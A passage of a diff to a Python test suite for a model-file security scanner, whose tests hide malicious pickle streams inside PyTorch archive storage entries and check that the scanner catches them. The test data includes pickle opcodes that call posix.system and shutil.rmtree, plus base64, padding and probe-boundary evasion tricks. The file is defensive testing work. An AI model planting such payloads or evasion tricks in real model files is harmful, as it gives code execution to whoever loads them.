storage_blob = b"N." + (b"c" * 4094) + b"\nignored\n." + b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_does_not_route_complete_text_padding_prefix(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = b"N." + (b" " * 5002) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) archive.writestr("archive/version", "3\n") @@ -6808,19 +6128,54 @@ def test_scan_file_scans_long_global_operand_crossing_trusted_probe_boundary(tmp report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + assert report.status == ScanStatus.COMPLETE + assert report.verdict == SafetyVerdict.CLEAN + assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] + + +def test_scan_file_scans_pickle_after_repeated_trivial_streams(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = (b"N." * 600) + b"cposix\nsystem\n(S'echo hidden'\ntR." + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_scans_pickle_after_repeated_trivial_streams_past_trusted_probe( + tmp_path: Path, +) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = (b"N." * 2048) + b"cposix\nsystem\n(S'echo hidden'\ntR." + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_trivial_literal_probe_skips_scanner_for_literal_free_streams(monkeypatch: pytest.MonkeyPatch) -> None: + calls = 0 + + def fail_if_called(*args: Any, **kwargs: Any) -> PickleReport: + nonlocal calls + calls += 1 + raise AssertionError("trivial literal probe should not recursively scan complete prefix streams") + + monkeypatch.setattr(package_api, "scan_bytes", fail_if_called) + + assert package_api._complete_trivial_literal_pickle_has_nested_security_pickle(b"I1\n." * 1200 + b"X") is False + assert calls == 0 + + +def test_scan_file_scans_proto0_string_operand_split_at_trusted_probe_boundary(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + storage_prefix = b"N." + (b" " * (package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"N.") - len(b"S"))) + b"S" + assert len(storage_prefix) == package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES + storage_blob = storage_prefix + b"'tensor-name'\n." + b"cposix\nsystem\n(S'echo hidden'\ntR." + _assert_storage_pickle_detected(archive_path, storage_blob) -def test_scan_file_scans_pickle_after_padding_at_trusted_probe_boundary(tmp_path: Path) -> None: +def test_scan_file_does_not_route_benign_proto0_string_operand_split_at_trusted_probe_boundary( + tmp_path: Path, +) -> None: archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b" " * 4094) + b"cposix\nsystem\n(S'echo hidden'\ntR." + storage_prefix = b"N." + (b" " * (package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"N.") - len(b"S"))) + b"S" + assert len(storage_prefix) == package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES + storage_blob = storage_prefix + b"'tensor-name'\n." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -6830,19 +6185,39 @@ def test_scan_file_scans_pickle_after_padding_at_trusted_probe_boundary(tmp_path report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings + assert report.status == ScanStatus.COMPLETE + assert report.verdict == SafetyVerdict.CLEAN + assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] + + +@pytest.mark.parametrize( + ("memo_prefix", "memo_suffix"), + [ + (b"Nq", b"\x00"), + (b"Nr", b"\x00\x00\x00\x00"), + ], +) +def test_scan_file_scans_truncated_memo_operand_after_trivial_stream_at_trusted_probe_boundary( + tmp_path: Path, + memo_prefix: bytes, + memo_suffix: bytes, +) -> None: + archive_path = tmp_path / "model.pt" + storage_prefix = ( + b"N." + (b" " * (package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"N.") - len(memo_prefix))) + memo_prefix ) + assert len(storage_prefix) == package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES + storage_blob = storage_prefix + memo_suffix + b"cposix\nsystem\n(S'echo hidden'\ntR." + _assert_storage_pickle_detected(archive_path, storage_blob) -def test_scan_file_scans_pickle_after_large_padding_past_trusted_probe_boundary(tmp_path: Path) -> None: +def test_scan_file_scans_truncated_inst_operand_after_trivial_stream_at_trusted_probe_boundary( + tmp_path: Path, +) -> None: archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b" " * 50000) + b"cposix\nsystem\n(S'echo hidden'\ntR." + storage_prefix = b"N." + (b" " * (package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"N.") - len(b"i"))) + b"i" + assert len(storage_prefix) == package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES + storage_blob = storage_prefix + b"posix\nsystem\n(S'echo hidden'\ntR." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -6852,19 +6227,17 @@ def test_scan_file_scans_pickle_after_large_padding_past_trusted_probe_boundary( report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] + assert report.status == ScanStatus.INCONCLUSIVE assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings + notice.code == "parse_incomplete" and notice.details.get("analysis_incomplete") is True + for notice in report.notices ) -def test_scan_file_scans_pickle_after_expanded_text_padding_prefix(tmp_path: Path) -> None: +def test_scan_file_routes_nested_extension_reference_literal_storage(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b" " * 65536) + b"cposix\nsystem\n(S'echo hidden'\ntR." + storage_blob = b"U\x03\x82\x01.." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -6874,19 +6247,14 @@ def test_scan_file_scans_pickle_after_expanded_text_padding_prefix(tmp_path: Pat report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + assert report.status == ScanStatus.INCONCLUSIVE + assert any(finding.rule_code == "EXTENSION_REF" for finding in report.findings) -def test_scan_file_scans_pickle_after_expanded_nul_padding_prefix(tmp_path: Path) -> None: +def test_scan_file_routes_base64_extension_reduce_literal_storage(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b"\x00" * 65536) + b"cposix\nsystem\n(S'echo hidden'\ntR." + storage_blob = b"S'ggFOMClSLg=='\n." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -6896,19 +6264,31 @@ def test_scan_file_scans_pickle_after_expanded_nul_padding_prefix(tmp_path: Path report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + assert report.verdict == SafetyVerdict.MALICIOUS + assert any(finding.rule_code == "S601" for finding in report.findings) + assert any(finding.rule_code == "DANGEROUS_CALL" for finding in report.findings) -def test_scan_file_does_not_route_complete_text_padding_prefix(tmp_path: Path) -> None: +@pytest.mark.parametrize( + ("memo_prefix", "memo_suffix"), + [ + (b"Nq", b"\x00"), + (b"Nr", b"\x00\x00\x00\x00"), + ], +) +def test_scan_file_does_not_route_benign_truncated_memo_operand_at_trusted_probe_boundary( + tmp_path: Path, + memo_prefix: bytes, + memo_suffix: bytes, +) -> None: archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b" " * 5002) + storage_prefix = ( + b"N." + (b" " * (package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"N.") - len(memo_prefix))) + memo_prefix + ) + assert len(storage_prefix) == package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES + storage_blob = storage_prefix + memo_suffix + b"." + storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) archive.writestr("archive/version", "3\n") @@ -6922,9 +6302,17 @@ def test_scan_file_does_not_route_complete_text_padding_prefix(tmp_path: Path) - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] -def test_scan_file_scans_pickle_after_unfinished_trivial_opcode_run(tmp_path: Path) -> None: +def test_scan_file_scans_malformed_separator_at_trusted_probe_boundary(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + storage_prefix = b"N." + (b" " * (package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"N.") - len(b"!"))) + b"!" + assert len(storage_prefix) == package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES + storage_blob = storage_prefix + b"S'AAAAAAcos\\x0asystem\\x0a)R.BBBB'\n." + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_does_not_route_benign_getattr_literal_storage(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b"N" * 4094) + b"cposix\nsystem\n(S'echo hidden'\ntR." + storage_blob = _proto0_string_literal(b"getattr(obj, 'bar')") storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -6934,65 +6322,52 @@ def test_scan_file_scans_pickle_after_unfinished_trivial_opcode_run(tmp_path: Pa report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - + assert report.status == ScanStatus.COMPLETE + assert report.verdict == SafetyVerdict.CLEAN + assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] -def test_scan_file_scans_pickle_after_repeated_trivial_streams(tmp_path: Path) -> None: + +def test_scan_file_scans_scalar_literal_with_raw_nested_pickle(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_blob = (b"N." * 600) + b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) + storage_blob = b"S'AAAAAAcos\\x0asystem\\x0a)R.BBBB'\n." + _assert_storage_pickle_detected(archive_path, storage_blob) - report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) +def test_scan_file_scans_scalar_literal_with_encoded_nested_pickle(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = b"S'" + base64.b64encode(b"cposix\nsystem\n(S'echo hidden'\ntR.") + b"'\n." + _assert_storage_pickle_detected(archive_path, storage_blob) -def test_scan_file_scans_pickle_after_repeated_trivial_streams_past_trusted_probe( - tmp_path: Path, -) -> None: +def test_scan_file_scans_padded_base64_scalar_before_following_token(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_blob = (b"N." * 2048) + b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) + malicious = base64.b64encode(b"cposix\nsystem\n)R.") + assert malicious.endswith(b"=") + storage_blob = b"S'" + malicious + base64.b64encode(b"benign") + b"'\n." + _assert_storage_pickle_detected(archive_path, storage_blob) - report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) +def test_scan_file_scans_padded_base64_scalar_before_short_suffix(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + malicious = base64.b64encode(b"cposix\nsystem\n)R.") + assert malicious.endswith(b"=") + storage_blob = b"S'" + malicious + b"AAAA" + b"'\n." + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_scans_padded_base64_scalar_between_following_tokens(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + safe_prefix = base64.b64encode(b"safe") + malicious = base64.b64encode(b"cposix\nsystem\n)R.") + assert safe_prefix.endswith(b"=") + assert malicious.endswith(b"=") + storage_blob = b"S'" + safe_prefix + malicious + base64.b64encode(b"benign") + b"'\n." + _assert_storage_pickle_detected(archive_path, storage_blob) -def test_scan_file_scans_pickle_after_many_trivial_int_streams(tmp_path: Path) -> None: +def test_scan_file_skips_padded_base64_scalar_near_match(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b"I1\n." * 1200) + b"cposix\nsystem\n(S'echo hidden'\ntR." + storage_blob = b"S'" + base64.b64encode(b"safe") + base64.b64encode(b"benign") + b"'\n." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -7002,35 +6377,14 @@ def test_scan_file_scans_pickle_after_many_trivial_int_streams(tmp_path: Path) - report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_trivial_literal_probe_skips_scanner_for_literal_free_streams(monkeypatch: pytest.MonkeyPatch) -> None: - calls = 0 - - def fail_if_called(*args: Any, **kwargs: Any) -> PickleReport: - nonlocal calls - calls += 1 - raise AssertionError("trivial literal probe should not recursively scan complete prefix streams") - - monkeypatch.setattr(package_api, "scan_bytes", fail_if_called) - - assert package_api._complete_trivial_literal_pickle_has_nested_security_pickle(b"I1\n." * 1200 + b"X") is False - assert calls == 0 + assert report.status == ScanStatus.COMPLETE + assert report.verdict == SafetyVerdict.CLEAN + assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] -def test_scan_file_scans_proto0_string_operand_split_at_trusted_probe_boundary(tmp_path: Path) -> None: +def test_scan_file_skips_padded_base64_scalar_short_suffix_near_match(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_prefix = b"N." + (b" " * (package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"N.") - len(b"S"))) + b"S" - assert len(storage_prefix) == package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - storage_blob = storage_prefix + b"'tensor-name'\n." + b"cposix\nsystem\n(S'echo hidden'\ntR." + storage_blob = b"S'" + base64.b64encode(b"safe") + b"AAAA" + b"'\n." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -7040,23 +6394,16 @@ def test_scan_file_scans_proto0_string_operand_split_at_trusted_probe_boundary(t report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + assert report.status == ScanStatus.COMPLETE + assert report.verdict == SafetyVerdict.CLEAN + assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] -def test_scan_file_does_not_route_benign_proto0_string_operand_split_at_trusted_probe_boundary( - tmp_path: Path, -) -> None: +def test_scan_file_skips_multiple_padded_base64_scalar_near_match(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_prefix = b"N." + (b" " * (package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"N.") - len(b"S"))) + b"S" - assert len(storage_prefix) == package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - storage_blob = storage_prefix + b"'tensor-name'\n." + storage_blob = ( + b"S'" + base64.b64encode(b"safe") + base64.b64encode(b"public") + base64.b64encode(b"benign") + b"'\n." + ) storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -7071,24 +6418,13 @@ def test_scan_file_does_not_route_benign_proto0_string_operand_split_at_trusted_ assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] -@pytest.mark.parametrize( - ("memo_prefix", "memo_suffix"), - [ - (b"Nq", b"\x00"), - (b"Nr", b"\x00\x00\x00\x00"), - ], -) -def test_scan_file_scans_truncated_memo_operand_after_trivial_stream_at_trusted_probe_boundary( - tmp_path: Path, - memo_prefix: bytes, - memo_suffix: bytes, -) -> None: +def test_scan_file_fails_closed_for_encoded_nested_pickle_after_candidate_budget(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_prefix = ( - b"N." + (b" " * (package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"N.") - len(memo_prefix))) + memo_prefix + nested_payload = b"cshutil\nrmtree\n(S'/tmp/modelaudit'\ntR." + encoded_payload = base64.b64encode( + (b"c" * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES + 1)) + (b"Z" * 9000) + nested_payload ) - assert len(storage_prefix) == package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - storage_blob = storage_prefix + memo_suffix + b"cposix\nsystem\n(S'echo hidden'\ntR." + storage_blob = b"S'" + encoded_payload + b"'\n." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -7098,23 +6434,41 @@ def test_scan_file_scans_truncated_memo_operand_after_trivial_stream_at_trusted_ report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + assert report.verdict != SafetyVerdict.CLEAN + assert "archive/data/0" in report.metadata["pickle_files"] -def test_scan_file_scans_truncated_inst_operand_after_trivial_stream_at_trusted_probe_boundary( - tmp_path: Path, -) -> None: +def test_scan_file_scans_shifted_base64_scalar_literal_nested_pickle(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_prefix = b"N." + (b" " * (package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"N.") - len(b"i"))) + b"i" - assert len(storage_prefix) == package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - storage_blob = storage_prefix + b"posix\nsystem\n(S'echo hidden'\ntR." + nested_payload = b"cposix\nsystem\n(S'echo hidden'\ntR." + storage_blob = b"S'" + (b"A" * 65) + base64.b64encode(nested_payload) + (b"A" * 64) + b"'\n." + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_scans_scalar_literal_before_trailing_trivial_stream(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + nested_payload = b"cposix\nsystem\n(S'echo hidden'\ntR." + storage_blob = b"S'" + base64.b64encode(nested_payload) + b"'\n.N." + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_scans_scalar_literal_after_trivial_stream(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + nested_payload = b"cposix\nsystem\n(S'echo hidden'\ntR." + storage_blob = b"N.S'" + base64.b64encode(nested_payload) + b"'\n." + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_scans_scalar_literal_after_clean_nontrivial_stream(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + nested_payload = b"cposix\nsystem\n(S'echo hidden'\ntR." + storage_blob = b"N.]\x85.S'" + base64.b64encode(nested_payload) + b"'\n." + _assert_storage_pickle_detected(archive_path, storage_blob) + + +def test_scan_file_preserves_suspicious_literal_after_trivial_stream(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = b"N.]S'__reduce__'\na." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -7124,34 +6478,31 @@ def test_scan_file_scans_truncated_inst_operand_after_trivial_stream_at_trusted_ report = scan_file(archive_path) - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert report.status == ScanStatus.INCONCLUSIVE + assert report.verdict == SafetyVerdict.SUSPICIOUS + assert "archive/data/0" in report.metadata["pickle_files"] assert any( - notice.code == "parse_incomplete" and notice.details.get("analysis_incomplete") is True - for notice in report.notices + finding.rule_code == "SUSPICIOUS_STRING" + and finding.location is not None + and f"{archive_path}:archive/data/0" in finding.location + for finding in report.findings ) -def test_scan_file_routes_nested_extension_reference_literal_storage(tmp_path: Path) -> None: +def test_scan_file_scans_scalar_literal_after_benign_binary_prefix(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_blob = b"U\x03\x82\x01.." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) + storage_blob = _proto0_string_literal(b"\x80\x04N.\xffcposix\nsystem\n(S'echo hidden'\ntR.") + _assert_storage_pickle_detected(archive_path, storage_blob) - report = scan_file(archive_path) - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert report.status == ScanStatus.INCONCLUSIVE - assert any(finding.rule_code == "EXTENSION_REF" for finding in report.findings) +def test_scan_file_scans_scalar_literal_with_escaped_binary_nested_pickle(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = _proto0_string_literal(pickle.dumps(MaliciousPayload(), protocol=4)) + _assert_storage_pickle_detected(archive_path, storage_blob) -def test_scan_file_routes_base64_extension_reduce_literal_storage(tmp_path: Path) -> None: +def test_scan_file_scans_scalar_literal_with_suspicious_string(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_blob = b"S'ggFOMClSLg=='\n." + storage_blob = b"S'eval('\n." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -7161,30 +6512,19 @@ def test_scan_file_routes_base64_extension_reduce_literal_storage(tmp_path: Path report = scan_file(archive_path) + assert report.verdict == SafetyVerdict.SUSPICIOUS assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert report.verdict == SafetyVerdict.MALICIOUS - assert any(finding.rule_code == "S601" for finding in report.findings) - assert any(finding.rule_code == "DANGEROUS_CALL" for finding in report.findings) + assert any( + finding.rule_code == "SUSPICIOUS_STRING" + and finding.location is not None + and f"{archive_path}:archive/data/0" in finding.location + for finding in report.findings + ) -@pytest.mark.parametrize( - ("memo_prefix", "memo_suffix"), - [ - (b"Nq", b"\x00"), - (b"Nr", b"\x00\x00\x00\x00"), - ], -) -def test_scan_file_does_not_route_benign_truncated_memo_operand_at_trusted_probe_boundary( - tmp_path: Path, - memo_prefix: bytes, - memo_suffix: bytes, -) -> None: +def test_scan_file_continues_literal_inspection_after_surrogate_unicode(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_prefix = ( - b"N." + (b" " * (package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"N.") - len(memo_prefix))) + memo_prefix - ) - assert len(storage_prefix) == package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - storage_blob = storage_prefix + memo_suffix + b"." + storage_blob = b"V\\ud800\nS'os.system'\n." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -7194,16 +6534,15 @@ def test_scan_file_does_not_route_benign_truncated_memo_operand_at_trusted_probe report = scan_file(archive_path) - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.CLEAN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] + assert report.status == ScanStatus.INCONCLUSIVE + assert report.verdict == SafetyVerdict.UNKNOWN + assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] + assert any(notice.code == "parse_incomplete" and notice.location is not None for notice in report.notices) -def test_scan_file_scans_malformed_separator_at_trusted_probe_boundary(tmp_path: Path) -> None: +def test_scan_file_scans_scalar_literal_with_magic_method_suspicious_string(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_prefix = b"N." + (b" " * (package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"N.") - len(b"!"))) + b"!" - assert len(storage_prefix) == package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - storage_blob = storage_prefix + b"S'AAAAAAcos\\x0asystem\\x0a)R.BBBB'\n." + storage_blob = b"S'__reduce__'\n." storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) @@ -7213,58 +6552,74 @@ def test_scan_file_scans_malformed_separator_at_trusted_probe_boundary(tmp_path: report = scan_file(archive_path) - assert report.verdict == SafetyVerdict.MALICIOUS + assert report.verdict == SafetyVerdict.SUSPICIOUS assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] assert any( - finding.rule_code == "DANGEROUS_CALL" + finding.rule_code == "SUSPICIOUS_STRING" + and finding.details.get("pattern") == "magic method" and finding.location is not None and f"{archive_path}:archive/data/0" in finding.location for finding in report.findings ) -def test_scan_file_does_not_route_benign_getattr_literal_storage(tmp_path: Path) -> None: +def test_scan_file_scans_initial_scalar_literal_split_at_trusted_probe_boundary(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_blob = _proto0_string_literal(b"getattr(obj, 'bar')") - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) + nested_payload = b"cposix\nsystem\n(S'echo hidden'\ntR." + storage_prefix = b"S'" + (b"A" * (package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"S'"))) + assert len(storage_prefix) == package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES + storage_blob = storage_prefix + base64.b64encode(nested_payload) + b"'\n." + _assert_storage_pickle_detected(archive_path, storage_blob) - report = scan_file(archive_path) - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.CLEAN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] +def test_scan_file_scans_frame_first_scalar_literal_with_encoded_nested_pickle(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + nested_payload = base64.b64encode(b"cposix\nsystem\n(S'echo hidden'\ntR.") + frame_payload = b"\x8c" + bytes([len(nested_payload)]) + nested_payload + b"." + storage_blob = b"\x95" + len(frame_payload).to_bytes(8, "little") + frame_payload + _assert_storage_pickle_detected(archive_path, storage_blob) -def test_scan_file_scans_scalar_literal_with_raw_nested_pickle(tmp_path: Path) -> None: +def test_scan_file_scans_malformed_separator_before_security_pickle(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" - storage_blob = b"S'AAAAAAcos\\x0asystem\\x0a)R.BBBB'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", 